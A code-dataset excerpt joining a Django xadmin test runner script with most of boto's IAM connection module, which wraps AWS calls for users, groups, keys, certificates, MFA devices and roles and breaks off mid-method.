jneight/django-xadmin | tests/runtests.py | 5 | 6424 | #!/usr/bin/env python
import os
import shutil
import sys
import tempfile
TEST_ROOT = os.path.realpath(os.path.dirname(__file__))
RUNTESTS_DIR = os.path.join(TEST_ROOT, 'xtests')
sys.path.insert(0, os.path.join(TEST_ROOT, os.pardir))
sys.path.insert(0, RUNTESTS_DIR)
TEST_TEMPLATE_DIR = 'templates'
TEMP_DIR = tempfile.mkdtemp(prefix='django_')
os.environ['DJANGO_TEST_TEMP_DIR'] = TEMP_DIR
ALWAYS_INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'xadmin',
'crispy_forms',
]
def get_test_modules():
modules = []
for f in os.listdir(RUNTESTS_DIR):
if (f.startswith('__init__') or
f.startswith('.') or
f.startswith('sql') or not os.path.isdir(os.path.join(RUNTESTS_DIR, f))):
continue
modules.append(f)
return modules
def setup(verbosity, test_labels):
from django.conf import settings
state = {
'INSTALLED_APPS': settings.INSTALLED_APPS,
'ROOT_URLCONF': getattr(settings, "ROOT_URLCONF", ""),
'TEMPLATE_DIRS': settings.TEMPLATE_DIRS,
'USE_I18N': settings.USE_I18N,
'LOGIN_URL': settings.LOGIN_URL,
'LANGUAGE_CODE': settings.LANGUAGE_CODE,
'MIDDLEWARE_CLASSES': settings.MIDDLEWARE_CLASSES,
'STATIC_URL': settings.STATIC_URL,
'STATIC_ROOT': settings.STATIC_ROOT,
}
# Redirect some settings for the duration of these tests.
settings.INSTALLED_APPS = ALWAYS_INSTALLED_APPS
settings.ROOT_URLCONF = 'urls'
settings.STATIC_URL = '/static/'
settings.STATIC_ROOT = os.path.join(TEMP_DIR, 'static')
settings.TEMPLATE_DIRS = (os.path.join(RUNTESTS_DIR, TEST_TEMPLATE_DIR),)
settings.USE_I18N = True
settings.LANGUAGE_CODE = 'en'
settings.MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.common.CommonMiddleware',
)
settings.SITE_ID = 1
# For testing comment-utils, we require the MANAGERS attribute
# to be set, so that a test email is sent out which we catch
# in our tests.
settings.MANAGERS = ("[email protected]",)
# Load all the ALWAYS_INSTALLED_APPS.
# (This import statement is intentionally delayed until after we
# access settings because of the USE_I18N dependency.)
from django.db.models.loading import get_apps, load_app
get_apps()
# Load all the test model apps.
test_labels_set = set([label.split('.')[0] for label in test_labels])
test_modules = get_test_modules()
for module_name in test_modules:
module_label = '.'.join(['xtests', module_name])
# if the module was named on the command line, or
# no modules were named (i.e., run all), import
# this module and add it to the list to test.
if not test_labels or module_name in test_labels_set:
if verbosity >= 2:
print "Importing application %s" % module_name
mod = load_app(module_label)
if mod:
if module_label not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS.append(module_label)
return state
def teardown(state):
from django.conf import settings
# Removing the temporary TEMP_DIR. Ensure we pass in unicode
# so that it will successfully remove temp trees containing
# non-ASCII filenames on Windows. (We're assuming the temp dir
# name itself does not contain non-ASCII characters.)
shutil.rmtree(unicode(TEMP_DIR))
# Restore the old settings.
for key, value in state.items():
setattr(settings, key, value)
def django_tests(verbosity, interactive, failfast, test_labels):
from django.conf import settings
state = setup(verbosity, test_labels)
extra_tests = []
# Run the test suite, including the extra validation tests.
from django.test.utils import get_runner
if not hasattr(settings, 'TEST_RUNNER'):
settings.TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
TestRunner = get_runner(settings)
test_runner = TestRunner(verbosity=verbosity, interactive=interactive,
failfast=failfast)
failures = test_runner.run_tests(test_labels or get_test_modules(), extra_tests=extra_tests)
teardown(state)
return failures
if __name__ == "__main__":
from optparse import OptionParser
usage = "%prog [options] [module module module ...]"
parser = OptionParser(usage=usage)
parser.add_option(
'-v','--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
help='Verbosity level; 0=minimal output, 1=normal output, 2=all '
'output')
parser.add_option(
'--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.')
parser.add_option(
'--failfast', action='store_true', dest='failfast', default=False,
help='Tells Django to stop running the test suite after first failed '
'test.')
parser.add_option(
'--settings',
help='Python path to settings module, e.g. "myproject.settings". If '
'this isn\'t provided, the DJANGO_SETTINGS_MODULE environment '
'variable will be used.')
parser.add_option(
'--liveserver', action='store', dest='liveserver', default=None,
help='Overrides the default address where the live server (used with '
'LiveServerTestCase) is expected to run from. The default value '
'is localhost:8081.'),
options, args = parser.parse_args()
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
elif "DJANGO_SETTINGS_MODULE" not in os.environ:
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
else:
options.settings = os.environ['DJANGO_SETTINGS_MODULE']
if options.liveserver is not None:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = options.liveserver
failures = django_tests(int(options.verbosity), options.interactive,
options.failfast, args)
if failures:
sys.exit(bool(failures))
| bsd-3-clause |
Nexenta/s3-tests | virtualenv/lib/python2.7/site-packages/boto/iam/connection.py | 12 | 57215 | # Copyright (c) 2010-2011 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010-2011, Eucalyptus Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto
import boto.jsonresponse
from boto.compat import json, six
from boto.resultset import ResultSet
from boto.iam.summarymap import SummaryMap
from boto.connection import AWSQueryConnection
DEFAULT_POLICY_DOCUMENTS = {
'default': {
'Statement': [
{
'Principal': {
'Service': ['ec2.amazonaws.com']
},
'Effect': 'Allow',
'Action': ['sts:AssumeRole']
}
]
},
'amazonaws.com.cn': {
'Statement': [
{
'Principal': {
'Service': ['ec2.amazonaws.com.cn']
},
'Effect': 'Allow',
'Action': ['sts:AssumeRole']
}
]
},
}
# For backward-compatibility, we'll preserve this here.
ASSUME_ROLE_POLICY_DOCUMENT = json.dumps(DEFAULT_POLICY_DOCUMENTS['default'])
class IAMConnection(AWSQueryConnection):
APIVersion = '2010-05-08'
def __init__(self, aws_access_key_id=None, aws_secret_access_key=None,
is_secure=True, port=None, proxy=None, proxy_port=None,
proxy_user=None, proxy_pass=None, host='iam.amazonaws.com',
debug=0, https_connection_factory=None, path='/',
security_token=None, validate_certs=True, profile_name=None):
super(IAMConnection, self).__init__(aws_access_key_id,
aws_secret_access_key,
is_secure, port, proxy,
proxy_port, proxy_user, proxy_pass,
host, debug, https_connection_factory,
path, security_token,
validate_certs=validate_certs,
profile_name=profile_name)
def _required_auth_capability(self):
return ['hmac-v4']
def get_response(self, action, params, path='/', parent=None,
verb='POST', list_marker='Set'):
"""
Utility method to handle calls to IAM and parsing of responses.
"""
if not parent:
parent = self
response = self.make_request(action, params, path, verb)
body = response.read()
boto.log.debug(body)
if response.status == 200:
if body:
e = boto.jsonresponse.Element(list_marker=list_marker,
pythonize_name=True)
h = boto.jsonresponse.XmlHandler(e, parent)
h.parse(body)
return e
else:
# Support empty responses, e.g. deleting a SAML provider
# according to the official documentation.
return {}
else:
boto.log.error('%s %s' % (response.status, response.reason))
boto.log.error('%s' % body)
raise self.ResponseError(response.status, response.reason, body)
#
# Group methods
#
def get_all_groups(self, path_prefix='/', marker=None, max_items=None):
"""
List the groups that have the specified path prefix.
:type path_prefix: string
:param path_prefix: If provided, only groups whose paths match
the provided prefix will be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {}
if path_prefix:
params['PathPrefix'] = path_prefix
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListGroups', params,
list_marker='Groups')
def get_group(self, group_name, marker=None, max_items=None):
"""
Return a list of users that are in the specified group.
:type group_name: string
:param group_name: The name of the group whose information should
be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'GroupName': group_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('GetGroup', params, list_marker='Users')
def create_group(self, group_name, path='/'):
"""
Create a group.
:type group_name: string
:param group_name: The name of the new group
:type path: string
:param path: The path to the group (Optional). Defaults to /.
"""
params = {'GroupName': group_name,
'Path': path}
return self.get_response('CreateGroup', params)
def delete_group(self, group_name):
"""
Delete a group. The group must not contain any Users or
have any attached policies
:type group_name: string
:param group_name: The name of the group to delete.
"""
params = {'GroupName': group_name}
return self.get_response('DeleteGroup', params)
def update_group(self, group_name, new_group_name=None, new_path=None):
"""
Updates name and/or path of the specified group.
:type group_name: string
:param group_name: The name of the new group
:type new_group_name: string
:param new_group_name: If provided, the name of the group will be
changed to this name.
:type new_path: string
:param new_path: If provided, the path of the group will be
changed to this path.
"""
params = {'GroupName': group_name}
if new_group_name:
params['NewGroupName'] = new_group_name
if new_path:
params['NewPath'] = new_path
return self.get_response('UpdateGroup', params)
def add_user_to_group(self, group_name, user_name):
"""
Add a user to a group
:type group_name: string
:param group_name: The name of the group
:type user_name: string
:param user_name: The to be added to the group.
"""
params = {'GroupName': group_name,
'UserName': user_name}
return self.get_response('AddUserToGroup', params)
def remove_user_from_group(self, group_name, user_name):
"""
Remove a user from a group.
:type group_name: string
:param group_name: The name of the group
:type user_name: string
:param user_name: The user to remove from the group.
"""
params = {'GroupName': group_name,
'UserName': user_name}
return self.get_response('RemoveUserFromGroup', params)
def put_group_policy(self, group_name, policy_name, policy_json):
"""
Adds or updates the specified policy document for the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
:type policy_json: string
:param policy_json: The policy document.
"""
params = {'GroupName': group_name,
'PolicyName': policy_name,
'PolicyDocument': policy_json}
return self.get_response('PutGroupPolicy', params, verb='POST')
def get_all_group_policies(self, group_name, marker=None, max_items=None):
"""
List the names of the policies associated with the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'GroupName': group_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListGroupPolicies', params,
list_marker='PolicyNames')
def get_group_policy(self, group_name, policy_name):
"""
Retrieves the specified policy document for the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
"""
params = {'GroupName': group_name,
'PolicyName': policy_name}
return self.get_response('GetGroupPolicy', params, verb='POST')
def delete_group_policy(self, group_name, policy_name):
"""
Deletes the specified policy document for the specified group.
:type group_name: string
:param group_name: The name of the group the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to delete.
"""
params = {'GroupName': group_name,
'PolicyName': policy_name}
return self.get_response('DeleteGroupPolicy', params, verb='POST')
def get_all_users(self, path_prefix='/', marker=None, max_items=None):
"""
List the users that have the specified path prefix.
:type path_prefix: string
:param path_prefix: If provided, only users whose paths match
the provided prefix will be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'PathPrefix': path_prefix}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListUsers', params, list_marker='Users')
#
# User methods
#
def create_user(self, user_name, path='/'):
"""
Create a user.
:type user_name: string
:param user_name: The name of the new user
:type path: string
:param path: The path in which the user will be created.
Defaults to /.
"""
params = {'UserName': user_name,
'Path': path}
return self.get_response('CreateUser', params)
def delete_user(self, user_name):
"""
Delete a user including the user's path, GUID and ARN.
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The name of the user to delete.
"""
params = {'UserName': user_name}
return self.get_response('DeleteUser', params)
def get_user(self, user_name=None):
"""
Retrieve information about the specified user.
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The name of the user to retrieve.
If not specified, defaults to user making request.
"""
params = {}
if user_name:
params['UserName'] = user_name
return self.get_response('GetUser', params)
def update_user(self, user_name, new_user_name=None, new_path=None):
"""
Updates name and/or path of the specified user.
:type user_name: string
:param user_name: The name of the user
:type new_user_name: string
:param new_user_name: If provided, the username of the user will be
changed to this username.
:type new_path: string
:param new_path: If provided, the path of the user will be
changed to this path.
"""
params = {'UserName': user_name}
if new_user_name:
params['NewUserName'] = new_user_name
if new_path:
params['NewPath'] = new_path
return self.get_response('UpdateUser', params)
def get_all_user_policies(self, user_name, marker=None, max_items=None):
"""
List the names of the policies associated with the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListUserPolicies', params,
list_marker='PolicyNames')
def put_user_policy(self, user_name, policy_name, policy_json):
"""
Adds or updates the specified policy document for the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
:type policy_json: string
:param policy_json: The policy document.
"""
params = {'UserName': user_name,
'PolicyName': policy_name,
'PolicyDocument': policy_json}
return self.get_response('PutUserPolicy', params, verb='POST')
def get_user_policy(self, user_name, policy_name):
"""
Retrieves the specified policy document for the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to get.
"""
params = {'UserName': user_name,
'PolicyName': policy_name}
return self.get_response('GetUserPolicy', params, verb='POST')
def delete_user_policy(self, user_name, policy_name):
"""
Deletes the specified policy document for the specified user.
:type user_name: string
:param user_name: The name of the user the policy is associated with.
:type policy_name: string
:param policy_name: The policy document to delete.
"""
params = {'UserName': user_name,
'PolicyName': policy_name}
return self.get_response('DeleteUserPolicy', params, verb='POST')
def get_groups_for_user(self, user_name, marker=None, max_items=None):
"""
List the groups that a specified user belongs to.
:type user_name: string
:param user_name: The name of the user to list groups for.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListGroupsForUser', params,
list_marker='Groups')
#
# Access Keys
#
def get_all_access_keys(self, user_name, marker=None, max_items=None):
"""
Get all access keys associated with an account.
:type user_name: string
:param user_name: The username of the user
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListAccessKeys', params,
list_marker='AccessKeyMetadata')
def create_access_key(self, user_name=None):
"""
Create a new AWS Secret Access Key and corresponding AWS Access Key ID
for the specified user. The default status for new keys is Active
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The username of the user
"""
params = {'UserName': user_name}
return self.get_response('CreateAccessKey', params)
def update_access_key(self, access_key_id, status, user_name=None):
"""
Changes the status of the specified access key from Active to Inactive
or vice versa. This action can be used to disable a user's key as
part of a key rotation workflow.
If the user_name is not specified, the user_name is determined
implicitly based on the AWS Access Key ID used to sign the request.
:type access_key_id: string
:param access_key_id: The ID of the access key.
:type status: string
:param status: Either Active or Inactive.
:type user_name: string
:param user_name: The username of user (optional).
"""
params = {'AccessKeyId': access_key_id,
'Status': status}
if user_name:
params['UserName'] = user_name
return self.get_response('UpdateAccessKey', params)
def delete_access_key(self, access_key_id, user_name=None):
"""
Delete an access key associated with a user.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type access_key_id: string
:param access_key_id: The ID of the access key to be deleted.
:type user_name: string
:param user_name: The username of the user
"""
params = {'AccessKeyId': access_key_id}
if user_name:
params['UserName'] = user_name
return self.get_response('DeleteAccessKey', params)
#
# Signing Certificates
#
def get_all_signing_certs(self, marker=None, max_items=None,
user_name=None):
"""
Get all signing certificates associated with an account.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
:type user_name: string
:param user_name: The username of the user
"""
params = {}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
if user_name:
params['UserName'] = user_name
return self.get_response('ListSigningCertificates',
params, list_marker='Certificates')
def update_signing_cert(self, cert_id, status, user_name=None):
"""
Change the status of the specified signing certificate from
Active to Inactive or vice versa.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type cert_id: string
:param cert_id: The ID of the signing certificate
:type status: string
:param status: Either Active or Inactive.
:type user_name: string
:param user_name: The username of the user
"""
params = {'CertificateId': cert_id,
'Status': status}
if user_name:
params['UserName'] = user_name
return self.get_response('UpdateSigningCertificate', params)
def upload_signing_cert(self, cert_body, user_name=None):
"""
Uploads an X.509 signing certificate and associates it with
the specified user.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type cert_body: string
:param cert_body: The body of the signing certificate.
:type user_name: string
:param user_name: The username of the user
"""
params = {'CertificateBody': cert_body}
if user_name:
params['UserName'] = user_name
return self.get_response('UploadSigningCertificate', params,
verb='POST')
def delete_signing_cert(self, cert_id, user_name=None):
"""
Delete a signing certificate associated with a user.
If the user_name is not specified, it is determined implicitly based
on the AWS Access Key ID used to sign the request.
:type user_name: string
:param user_name: The username of the user
:type cert_id: string
:param cert_id: The ID of the certificate.
"""
params = {'CertificateId': cert_id}
if user_name:
params['UserName'] = user_name
return self.get_response('DeleteSigningCertificate', params)
#
# Server Certificates
#
def list_server_certs(self, path_prefix='/',
marker=None, max_items=None):
"""
Lists the server certificates that have the specified path prefix.
If none exist, the action returns an empty list.
:type path_prefix: string
:param path_prefix: If provided, only certificates whose paths match
the provided prefix will be returned.
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {}
if path_prefix:
params['PathPrefix'] = path_prefix
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListServerCertificates',
params,
list_marker='ServerCertificateMetadataList')
# Preserves backwards compatibility.
# TODO: Look into deprecating this eventually?
get_all_server_certs = list_server_certs
def update_server_cert(self, cert_name, new_cert_name=None,
new_path=None):
"""
Updates the name and/or the path of the specified server certificate.
:type cert_name: string
:param cert_name: The name of the server certificate that you want
to update.
:type new_cert_name: string
:param new_cert_name: The new name for the server certificate.
Include this only if you are updating the
server certificate's name.
:type new_path: string
:param new_path: If provided, the path of the certificate will be
changed to this path.
"""
params = {'ServerCertificateName': cert_name}
if new_cert_name:
params['NewServerCertificateName'] = new_cert_name
if new_path:
params['NewPath'] = new_path
return self.get_response('UpdateServerCertificate', params)
def upload_server_cert(self, cert_name, cert_body, private_key,
cert_chain=None, path=None):
"""
Uploads a server certificate entity for the AWS Account.
The server certificate entity includes a public key certificate,
a private key, and an optional certificate chain, which should
all be PEM-encoded.
:type cert_name: string
:param cert_name: The name for the server certificate. Do not
include the path in this value.
:type cert_body: string
:param cert_body: The contents of the public key certificate
in PEM-encoded format.
:type private_key: string
:param private_key: The contents of the private key in
PEM-encoded format.
:type cert_chain: string
:param cert_chain: The contents of the certificate chain. This
is typically a concatenation of the PEM-encoded
public key certificates of the chain.
:type path: string
:param path: The path for the server certificate.
"""
params = {'ServerCertificateName': cert_name,
'CertificateBody': cert_body,
'PrivateKey': private_key}
if cert_chain:
params['CertificateChain'] = cert_chain
if path:
params['Path'] = path
return self.get_response('UploadServerCertificate', params,
verb='POST')
def get_server_certificate(self, cert_name):
"""
Retrieves information about the specified server certificate.
:type cert_name: string
:param cert_name: The name of the server certificate you want
to retrieve information about.
"""
params = {'ServerCertificateName': cert_name}
return self.get_response('GetServerCertificate', params)
def delete_server_cert(self, cert_name):
"""
Delete the specified server certificate.
:type cert_name: string
:param cert_name: The name of the server certificate you want
to delete.
"""
params = {'ServerCertificateName': cert_name}
return self.get_response('DeleteServerCertificate', params)
#
# MFA Devices
#
def get_all_mfa_devices(self, user_name, marker=None, max_items=None):
"""
Get all MFA devices associated with an account.
:type user_name: string
:param user_name: The username of the user
:type marker: string
:param marker: Use this only when paginating results and only
in follow-up request after you've received a response
where the results are truncated. Set this to the value of
the Marker element in the response you just received.
:type max_items: int
:param max_items: Use this only when paginating results to indicate
the maximum number of groups you want in the response.
"""
params = {'UserName': user_name}
if marker:
params['Marker'] = marker
if max_items:
params['MaxItems'] = max_items
return self.get_response('ListMFADevices',
params, list_marker='MFADevices')
def enable_mfa_device(self, user_name, serial_number,
auth_code_1, auth_code_2):
"""
Enables the specified MFA device and associates it with the
specified user.
:type user_name: string
:param user_name: The username of the user
:type serial_number: string
:param serial_number: The serial number which uniquely identifies
the MFA device.
:type auth_code_1: string
:param auth_code_1: An authentication code emitted by the device.
:type auth_code_2: string
:param auth_code_2: A subsequent authentication code emitted
by the device.
"""
params = {'UserName': user_name,
'SerialNumber': serial_number,
'AuthenticationCode1': auth_code_1,
'AuthenticationCode2': auth_code_2}
return self.get_response('EnableMFADevice', params)
def deactivate_mfa_device(self, user_name, serial_number):
"""
Deactivates the specified MFA device and removes it from
association with the user.
:type user_name: string
:param user_name: The username of the user
:type serial_number: string
:param serial_number: The serial number which uniquely identifies
the MFA device.
"""
params = {'UserName': user_name,
'SerialNumber': serial_number}
return self.get_response('DeactivateMFADevice', params)
def resync_mfa_device(self, user_name, serial_number,
auth_code_1, auth_code_2):
"""
Syncronizes the specified MFA device with the AWS servers.
:type user_name: string
:param user_name: The username of the user
:type serial_number: string
:param serial_number: The serial number which uniquely identifies
the MFA device.
:type auth_code_1: string
:param auth_code_1: An authentication code emitted by the device.
:type auth_code_2: string
:param auth_code_2: A subsequent authentication code emitted
by the device.
"""
params = {'UserName': user_name,
'SerialNumber': serial_number,
'AuthenticationCode1': auth_code_1,
'AuthenticationCode2': auth_code_2}
return self.get_response('ResyncMFADevice', params)
#
# Login Profiles
#
def get_login_profiles(self, user_name):
"""
Retrieves the login profile for the specified user.
:type user_name: string
:param user_name: The username of the user
"""
params = {'UserName': user_name}
return self.get_response('GetLoginProfile', params)
def create_login_profile(self, user_name, password):
"""
Creates a login profile for the specified user, give the user the
ability to access AWS services and the AWS Management Console.
:type user_name: string
:param user_name: The name of the user
:type password: string
:param password: The new password for the user
"""
params = {'UserName': user_name,
'Password': password}
return self.get_response('CreateLoginProfile', params)
def delete_login_profile(self, user_name):
"""
Deletes the login profile associated with the specified user.
:type user_name: string
:param user_name: The name of the user to delete.
"""
params = {'UserName': user_name}
return self.get_response('DeleteLoginProfile', params)
def update_login_profile(self, user_name, password):
"""
Resets the password associated with the user's login profile.
:type user_name: string
:param user_name: The name of the user
:type password: string
:param password: The new password for the user
"""
params = {'UserName': user_name,
'Password': password}
return self.get_response('UpdateLoginProfile', params)
def create_account_alias(self, alias):
"""
Creates a new alias for the AWS account.
For more information on account id aliases, please see
http://goo.gl/ToB7G
:type alias: string
:param alias: The alias to attach to the account.
"""
params = {'AccountAlias': alias}
return self.get_response('CreateAccountAlias', params)
def delete_account_alias(self, alias):
"""
Deletes an alias for the AWS account.
For more information on account id aliases, please see
http://goo.gl/ToB7G
:type alias: string
:param alias: The alias to remove from the account.
"""
params = {'AccountAlias': alias}
return self.get_response('DeleteAccountAlias', params)
def get_account_alias(self):
"""
Get the alias for the current account.
This is referred to in the docs as list_account_aliases,
but it seems you can only have one account alias currently.
For more information on account id aliases, please see
http://goo.gl/ToB7G
"""
return self.get_response('ListAccountAliases', {},
list_marker='AccountAliases')
def get_signin_url(self, service='ec2'):
"""
Get the URL where IAM users can use their login profile to sign in
to this account's console.
:type service: string
:param service: Default service to go to in the console.
"""
alias = self.get_account_alias()
if not alias:
raise Exception('No alias associated with this account. Please use iam.create_account_alias() first.')
resp = alias.get('list_account_aliases_response', {})
result = resp.get('list_account_aliases_result', {})
aliases = result.get('account_aliases', [])
if not len(aliases):
raise Exception('No alias associated with this account. Please use iam.create_account_alias() first.')
# We'll just use the first one we find.
alias = aliases[0]
if self.host == 'iam.us-gov.amazonaws.com':
return "https://%s.signin.amazonaws-us-gov.com/console/%s" % (
alias,
service
)
elif self.host.endswith('amazonaws.com.cn'):
return "https://%s.signin.amazonaws.cn/console/%s" % (
alias,
service
)
else:
return "https://%s.signin.aws.amazon.com/console/%s" % (
alias,
service
)
def get_account_summary(self):
"""
Get the alias for the current account.
This is referred to in the docs as list_account_aliases,
but it seems you can only have one account alias currently.
For more information on account id aliases, please see
http://goo.gl/ToB7G
"""
return self.get_object('GetAccountSummary', {}, SummaryMap)
#
# IAM Roles
#
def add_role_to_instance_profile(self, instance_profile_name, role_name):
"""
Adds the specified role to the specified instance profile.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to update.
:type role_name: string
:param role_name: Name of the role to add.
"""
return self.get_response('AddRoleToInstanceProfile',
{'InstanceProfileName': instance_profile_name,
'RoleName': role_name})
def create_instance_profile(self, instance_profile_name, path=None):
"""
Creates a new instance profile.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to create.
:type path: string
:param path: The path to the instance profile.
"""
params = {'InstanceProfileName': instance_profile_name}
if path is not None:
params['Path'] = path
return self.get_response('CreateInstanceProfile', params)
def _build_policy(self, assume_role_policy_document=None):
if assume_role_policy_document is not None:
if isinstance(assume_role_policy_document, six.string_types):
# Historically, they had to pass a string. If it's a string,
# assume the user has already handled it.
return assume_role_policy_document
else:
for tld, policy in DEFAULT_POLICY_DOCUMENTS.items():
if tld is 'default':
# Skip the default. We'll fall back to it if we don't find
# anything.
continue
if self.host and self.host.endswith(tld):
assume_role_policy_document = policy
break
if not assume_role_policy_document:
assume_role_policy_document = DEFAULT_POLICY_DOCUMENTS['default']
# Dump the policy (either user-supplied ``dict`` or one of the defaults)
return json.dumps(assume_role_policy_document)
def create_role(self, role_name, assume_role_policy_document=None, path=None):
"""
Creates a new role for your AWS account.
The policy grants permission to an EC2 instance to assume the role.
The policy is URL-encoded according to RFC 3986. Currently, only EC2
instances can assume roles.
:type role_name: string
:param role_name: Name of the role to create.
:type assume_role_policy_document: ``string`` or ``dict``
:param assume_role_policy_document: The policy that grants an entity
permission to assume the role.
:type path: string
:param path: The path to the role.
"""
params = {
'RoleName': role_name,
'AssumeRolePolicyDocument': self._build_policy(
assume_role_policy_document
),
}
if path is not None:
params['Path'] = path
return self.get_response('CreateRole', params)
def delete_instance_profile(self, instance_profile_name):
"""
Deletes the specified instance profile. The instance profile must not
have an associated role.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to delete.
"""
return self.get_response(
'DeleteInstanceProfile',
{'InstanceProfileName': instance_profile_name})
def delete_role(self, role_name):
"""
Deletes the specified role. The role must not have any policies
attached.
:type role_name: string
:param role_name: Name of the role to delete.
"""
return self.get_response('DeleteRole', {'RoleName': role_name})
def delete_role_policy(self, role_name, policy_name):
"""
Deletes the specified policy associated with the specified role.
:type role_name: string
:param role_name: Name of the role associated with the policy.
:type policy_name: string
:param policy_name: Name of the policy to delete.
"""
return self.get_response(
'DeleteRolePolicy',
{'RoleName': role_name, 'PolicyName': policy_name})
def get_instance_profile(self, instance_profile_name):
"""
Retrieves information about the specified instance profile, including
the instance profile's path, GUID, ARN, and role.
:type instance_profile_name: string
:param instance_profile_name: Name of the instance profile to get
information about.
"""
return self.get_response('GetInstanceProfile',
{'InstanceProfileName': instance_profile_name})
def get_role(self, role_name):
"""
Retrieves information about the specified role, including the role's
path, GUID, ARN, and the policy granting permission to EC2 to assume
the role.
:type role_name: string
